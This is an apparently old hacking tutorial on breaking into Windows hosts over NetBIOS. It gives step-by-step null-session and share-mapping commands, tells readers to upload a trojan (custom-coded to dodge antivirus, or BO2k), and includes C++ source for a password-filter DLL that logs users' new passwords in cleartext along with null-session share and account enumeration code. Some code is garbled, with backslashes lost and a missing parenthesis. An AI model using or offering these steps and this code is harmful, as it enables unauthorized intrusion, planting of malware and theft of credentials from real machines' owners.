
Hacking Netbios


Well..first of all hello folks..

In this tutorial I wanna show u how to hack via NetBios.

And here is what u need:

- Windows ( for the method I'll explain here )

- Internet ;)

- NetBIOS scans

- the good old DOS console

- a bit of knowledge about DOS and nbtstat.exe and net.exe ( see Microsoft TechNet for a description )

- knowledge about trojans or backdoors ( how they work...)

************************************************************************************

Lets start...

1. Fire up a DOS box

2. Now go to root ( usually c: ) and enter " nbtstat -A IP "

( without " ", IP is the IP of the remote PC. You get the IP's from your scans )

If the server/PC is hackable the result should be a table like this:

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------

computername <00> UNIQUE Registered

workgroupname <00> GROUP Registered

computername <20> UNIQUE Registered

workgroupname <1E> GROUP Registered

workgroupname <1D> UNIQUE Registered

..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )

************************************************************************************

You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan

(available at www.packetstormsecurity.nl) 'cause ports 135-139 usually indicate NetBIOS.

An original scan with X-Scan could look like:

xxx.xxx.xxx.xxx

Administrator - [built-in account for administering the computer/domain]

Account type: Administrator

Password age: 291 Day 10 Hour 28 Minute 34 Sec.

Bad password count: 0   Number logons: 9

Last logon: GMT Wed Aug 14 15:26:38 2002

Guest - [built-in account for guest access to the computer/domain]

Account type: Guest

Password age: 0 Day 0 Hour 0 Minute 0 Sec.

Bad password count: 0   Number logons: 0

************************************************************************************

3. Mkay now enter this in the DOS box:

( you have to replace the xxx.... by the IP of the target and don't type the c:\> 'cause it is already there ;) )

c:\>net view \\xxx.xxx.xxx.xxx

Response (possible):

System error 5 has occurred.

Access denied.

c:\>

ooops...wasn't as easy as we thought...well ok type:

c:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" ( this creates a null session )

Response: The command completed successfully.

Ok..lets test it again...

c:\>net view \\xxx.xxx.xxx.xxx

Response: Shared resources on xxx.xxx.xxx.xxx

* Here it displays the resources

mkay...now we know the shared resources

Now we assign a drive to a shared folder...

c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name )

Response: The command completed successfully.

Now we switch to our new drive:

c:m:

..usually nothing interesting in a shared folder. And because of that...

4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code a

small trojan that does all what we want, because existing trojans are recognized by AV

tools. But u can also take an existing one like BO2k ...

Now upload:

m:copy c:path_to_the_trojan_here m:

Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll

5. Now we close the connection to the remote folder with:

c:\>net use m: /DELETE

******************************************************************************************

******************************************************************************************

********************** C++ source for this shit to save time ****************************

******************************************************************************************

******************************************************************************************

********************* Perhaps you have to edit it at several lines ***********************

******************************************************************************************

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>



// Counted wide string as handed to the password-filter exports below: len and
// maxlen are byte counts (PasswordChangeNotify divides len by sizeof(WCHAR))
// and buff is apparently not NUL-terminated, since the callee terminates its
// own copy. NOTE(review): this mirrors the layout of the SDK's UNICODE_STRING
// (Length / MaximumLength / Buffer) — confirm against the header rather than
// relying on this hand-rolled definition.
struct UNI_STRING {

USHORT len;

USHORT maxlen;

WCHAR *buff;

};



// Drop-file handle: opened in InitializeChangeNotify, written by both exports,
// never closed anywhere in this listing.
static HANDLE fh;



// Export name used by the LSA password-filter interface; LSA calls it once when
// it loads a DLL registered as a password filter (the registration itself is
// not part of this listing). This version only opens the drop file that
// PasswordChangeNotify appends to. Defender note: the hard-coded path in the
// CreateFile call (backslashes lost in this paste) and the fixed "gestarted"
// marker string are stable on-disk artifacts — an unexpected password-filter
// registration together with a file like this is what to alert on. Always
// returns TRUE, i.e. reports success to LSA whether or not CreateFile
// succeeded (fh is never checked here).
BOOLEAN __stdcall InitializeChangeNotify ()

{

DWORD wrote;

// CREATE_ALWAYS truncates any existing file; WRITE_THROUGH pushes each write to disk.
fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,

0);

// Marker line ("gestartet" = "started"; the trailing 'n' was a '\n' before the
// paste stripped the backslash).
WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);

return TRUE;

}



// Export name used by the LSA password-filter interface; LSA calls it after a
// password change has been committed, handing over the account name, its RID
// and the new password as counted (byte-length) wide strings. This body writes
// all three — the password in cleartext — to the file fh opened in
// InitializeChangeNotify, which is what makes a "filter" DLL like this a
// credential-capture hook rather than a policy check. The constant "User = ",
// "p4sswd = " and "RID = " fragments below are usable detection strings for
// the drop file. Returns 0 on every path.
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,

struct UNI_STRING *passwd)

{

DWORD wrote;

WCHAR wbuf[200];

char buf[512];

char buf1[200];

DWORD len;



// Counted string -> NUL-terminated local: len is a byte count, so it is
// divided by sizeof(WCHAR) to find where the terminator goes.
memcpy(wbuf, user->buff, user->len);

len = user->len/sizeof(WCHAR);

wbuf[len] = 0;

// Narrow to the ANSI code page (at most 199 bytes) for the text log line.
wcstombs(buf1, wbuf, 199);

sprintf(buf, "User = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



// Same treatment for the new password.
memcpy(wbuf, passwd->buff, passwd->len);

len = passwd->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "p4sswd = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



// RID in hex; the trailing 'n' was a '\n' before the paste stripped the backslash.
sprintf(buf, "RID = %xn", rid);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



return 0L;

}





// Connects to TargetHost over an anonymous ("null") IPC$ session and fills the
// dialog's m_Victims tree with the shares and users it can read — the same
// read-only path an audit tool takes to check whether a host still permits
// anonymous enumeration. Reading notes: this paste lost its backslashes, so
// every L'' below was a backslash or NUL wide-char literal and the
// RemoteResource prefix logic cannot be read as-is; machineRoot, userRoot and
// adminRoot are only assigned on success paths yet are used unconditionally
// later; and the function returns FALSE on every path, so the caller must
// read GetLastError(), which is set to the NetUseDel status just before
// return.
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)

{

// Borrow the CString's raw buffer; ReleaseBuffer() at the end hands it back.
char* pTemp = TargetHost.GetBuffer(256);

WCHAR wszServ[256];

LPWSTR Server = NULL;



//convert to unicode

// ANSI -> UTF-16 (terminator included, hence strlen+1) for the wide Net* APIs.
MultiByteToWideChar(CP_ACP, 0, pTemp,

strlen(pTemp)+1,

wszServ,

sizeof(wszServ)/sizeof(wszServ[0]) );



Server = wszServ;



// Suffix appended to the server name; presumably L"\\IPC$" before the paste
// dropped the backslash.
LPCWSTR szIpc = L"IPC$";

WCHAR RemoteResource[UNCLEN + 5 + 1];

DWORD dwServNameLen;

DWORD dwRC;



NET_API_STATUS nas;



USE_INFO_2 ui2;

SHARE_INFO_1* pSHInfo1 = NULL;

DWORD

dwEntriesRead;

DWORD dwTotalEntries;





// Tree handles; none is initialised here (see header comment).
HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;



char sharename[256];

char remark[256];



// Empty-name guard (the L'' literal was L'\0' before the paste).
if(Server == NULL || *Server == L'')

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



dwServNameLen = lstrlenW( Server );



// Build the UNC prefix: this branch presumably distinguishes a bare name
// (needs "\\\\" prepended) from one already written with leading backslashes
// (then two characters of the name are not counted towards the length).
if(Server[0] != L''&& Server[1] != L'')

{



RemoteResource[0] = L'';



RemoteResource[1] = L'';



RemoteResource[2] = L'';



}



else



{

dwServNameLen -= 2;



RemoteResource[0] = L'';

}



// Reject names longer than a NetBIOS computer name.
if(dwServNameLen >CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;

if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

// Anonymous ("null") session: empty user, password and domain on the IPC$ share.
ZeroMemory(&ui2, sizeof(ui2));

ui2.ui2_local = NULL;

ui2.ui2_remote = (LPTSTR) RemoteResource;

ui2.ui2_asg_type = USE_IPC;

ui2.ui2_password = (LPTSTR) L"";

ui2.ui2_username = (LPTSTR) L"";

ui2.ui2_domainname = (LPTSTR) L"";





nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);



// NetUseAdd returns its status directly; this dwRC is never read afterwards.
dwRC = GetLastError();

// A successful null session gets a root node in the victims tree.
if( nas == NERR_Success )



{

machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,

TVI_ROOT);



}





// Enumerate shares at info level 1 (name + remark). NOTE(review): the wide
// server name is cast to char*; this only works if the NetShareEnum resolved
// here is the Unicode variant — confirm against the build's headers.
nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,

MAX_PREFERRED_LENGTH,



&dwEntriesRead,

&dwTotalEntries, NULL);



// Never read afterwards (see above).
dwRC = GetLastError();



if( nas == NERR_Success )



{

if(dwTotalEntries > 0)



{

shareRoot = pDlg->m_Victims.InsertItem("Shares",

machineRoot,TVI_LAST);



userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);



adminRoot = pDlg->m_Victims.InsertItem("Admin",

machineRoot,TVI_LAST);



}

// Walks dwTotalEntries rather than dwEntriesRead (presumably equal because
// MAX_PREFERRED_LENGTH asks for everything). pSHInfo1 is advanced with ++ and
// is never passed to NetApiBufferFree, so the enumeration buffer leaks on
// every call.
for(int x=0; x<(int)dwTotalEntries; x++)



{





WideCharToMultiByte(CP_ACP, 0, (const unsigned

short*)pSHInfo1->shi1_netname, -1,



sharename, 256, NULL, NULL );





WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,



remark, 256, NULL, NULL );



CString ShareDetails = sharename;



ShareDetails = ShareDetails + " - " + remark;



attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);

pSHInfo1++;

}

}





// Users (and the RID-500 account) are added by DoNetUserEnum; userRoot and
// adminRoot are uninitialised here if NetShareEnum failed or found no shares.
DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

// Tear the session down; its status becomes the caller-visible error code.
nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

TargetHost.ReleaseBuffer();

SetLastError( nas );

return FALSE;

}







// Resolves pUser on pServer to a SID and reports whether its last
// sub-authority — the RID — is 500, i.e. the built-in Administrator account
// regardless of what it has been renamed to. On a hit, Name is formatted as
// "Admin is <domain><user>" (no separator between the two %s) and true is
// returned; otherwise false. szDomainName is a buffer declared elsewhere in
// the file (not shown); dwDomainName = 256 is presumably its size. Two
// defects to keep in mind when reading results: the SID is obtained with
// malloc but released with delete (mismatched allocator), and if the first
// LookupAccountName fails with anything other than ERROR_INSUFFICIENT_BUFFER,
// pUserSID is still NULL when GetSidSubAuthorityCount dereferences it.
bool GetAdmin(char* pServer, char* pUser, CString& Name)

{

// Unused in this block.
BOOL fAdmin = FALSE;

DWORD dwDomainName,dwSize,dwAdminVal;

SID_NAME_USE use;

PSID pUserSID = NULL; // SID for the user

int rc;

int iSubCount;



bool bFoundHim = 0;

dwDomainName = 256;

dwSize = 0;

dwAdminVal = 0;

iSubCount = 0;



// First call with a NULL SID buffer only to learn the required size.
rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

// The BOOL result is discarded; the error code is what gets tested.
rc = GetLastError();



if(rc == ERROR_INSUFFICIENT_BUFFER)

{

pUserSID = (PSID) malloc(dwSize);





// Second call with a buffer of the reported size.
rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

}



// RID = last sub-authority of the SID.
iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));



// 500 is the well-known RID of the built-in Administrator account.
if(dwAdminVal==500)

{

Name.Format("Admin is %s%s

", szDomainName, pUser);

bFoundHim = true;

}



// Mismatched with the malloc above (see header comment).
delete pUserSID;

return bFoundHim;

}







// Pages through NetUserEnum (info level 10) for pServer, adding every account
// under userRoot and — once, via GetAdmin — the RID-500 account under
// adminRoot. Relies on file-scope state that is not in this listing:
// RemoteResource, dwServNameLen and GotAdmin are used but declared nowhere
// here. As in EstablishNullSession the L'' literals were backslash / NUL
// characters before the paste stripped them, and `if(GotAdmin` below has lost
// its closing parenthesis, so this block does not compile as shown. Any status
// other than ERROR_SUCCESS / ERROR_MORE_DATA ends the loop and is printed.
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)

{

USER_INFO_10 *pUserbuf, *pCurUser;

DWORD dwRead, dwRemaining, dwResume, dwRC;



char userName[256];

char userServer[256];



// Resume handle for NetUserEnum paging; 0 starts from the beginning.
dwResume = 0;



// Same UNC-prefix construction as EstablishNullSession (backslashes lost in paste).
if(pServer[0] != L'' && pServer[1] != L'')

{

RemoteResource[0] = L'';

RemoteResource[1] = L'';

RemoteResource[2] = L'';

}

else



{

dwServNameLen -= 2;





RemoteResource[0] = L'';

}



// Reject names longer than a NetBIOS computer name.
if(dwServNameLen > CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return;

}



if(lstrcatW(RemoteResource, pServer) == NULL) return;



do

{



pUserbuf = NULL;



// Ask for at most 1024 bytes per call, so long user lists arrive as several pages.
dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf,

1024,

&dwRead, &dwRemaining, &dwResume);

if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)

break;



DWORD i;

for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)



{



// Narrow name and server to ANSI because GetAdmin takes char*.
WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,

-1, userName, 256, NULL, NULL );



WideCharToMultiByte( CP_ACP, 0, pServer, -1,

userServer, 256, NULL, NULL );



// Only look for the built-in Administrator until it has been found once.
if(!GotAdmin)

{

CString Admin;

GotAdmin = GetAdmin(userServer, userName, Admin);

if(GotAdmin



{

Admin.TrimRight();

HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);

pDlg->m_Victims.EnsureVisible(adminChild);



}



}



CString strUserName = userName;

pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);



}

// Free this page before requesting the next one.
if (pUserbuf != NULL)

NetApiBufferFree(pUserbuf);

} while (dwRC == ERROR_MORE_DATA);



// Apparently a '\n' in the format string was turned into a line break by the paste.
if (dwRC != ERROR_SUCCESS)

printf("NUE() returned %lu

", dwRC);

}

***************************************************************************************

Some NetBios hacking tools:

DumpSec

http://www.somarsoft.com

Windows NT/2000

Legion

http://www.technotronic.com

Windows 9x/NT/2000, UNIX/Linux

NAT

http://www.packetstormsecurity.nl

Windows 9x/NT, UNIX/Linux

****************************************************************************************

Congratulation...you've hacked him now u can connect him with http://FTP.
